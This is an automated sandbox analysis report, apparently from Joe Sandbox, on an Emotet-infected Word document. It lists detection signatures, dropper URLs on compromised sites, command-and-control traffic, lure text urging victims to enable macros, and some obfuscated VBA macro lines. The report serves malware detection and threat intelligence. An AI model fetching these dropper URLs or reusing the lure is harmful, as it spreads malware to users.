Analysis Report MAIL-0573188.doc

Overview

General Information

Sample Name:	MAIL-0573188.doc
Analysis ID:	337092
MD5:	7ad5e41d03b2dfe72af417fa5b0cc164
SHA1:	2a6c0fa93aba9ce560d271ce65d79db69422fc6c
SHA256:	2d6cbcbc803638a13705a3b26afb3b34b72bc58601215566ba858c62882b8e61
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://veterinariadrpopui.com	Avira URL Cloud: Label: malware
Source: http://veterinariadrpopui.com/content/5f18Q/	Avira URL Cloud: Label: malware
Source: http://sofsuite.com/wp-includes/2jm3nIk/	Avira URL Cloud: Label: phishing
Source: http://khanhhoahomnay.net/wordpress/CGMC/	Avira URL Cloud: Label: malware
Source: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	Avira URL Cloud: Label: malware
Source: http://shop.elemenslide.com/wp-content/n/	Avira URL Cloud: Label: malware
Source: http://wpsapk.com/wp-admin/v/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: veterinariadrpopui.com	Virustotal: Detection: 7%			Perma Link
Source: khanhhoahomnay.net	Virustotal: Detection: 6%			Perma Link

Multi AV Scanner detection for submitted file

Source: MAIL-0573188.doc	Virustotal: Detection: 66%			Perma Link
Source: MAIL-0573188.doc	Metadefender: Detection: 47%			Perma Link

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,	7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,	7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,	7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F75AE CryptDecodeObjectEx,	13_2_001F75AE

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_001F109C FindFirstFileW,

13_2_001F109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: wpsapk.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 45.130.229.91:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.141.14:80

Networking:

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://veterinariadrpopui.com/content/5f18Q/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/n/ HTTP/1.1Host: shop.elemenslide.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 209.59.139.39 209.59.139.39
Source: Joe Sandbox View	IP Address: 45.130.229.91 45.130.229.91

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: POST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1DNT: 0Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWzUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 8068Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_0020023A InternetReadFile,

13_2_0020023A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1917291-551E-40AF-9919-E039C2A6E74E}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/n/ HTTP/1.1Host: shop.elemenslide.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: wpsapk.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp	String found in binary or memory: http://beatlemail.net/picture.php?blogid=0
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com
Source: powershell.exe, 00000005.00000002.2109649059.000000001B86F000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaneH)
Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2103265180.0000000001FC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: https://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: https://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: https://shop.elemenslide.comp
Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K O a S
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K O a S
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Document contains an embedded VBA macro with suspicious strings

Source: MAIL-0573188.doc	OLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")	Name: G8xesq0b8jlsfrsp
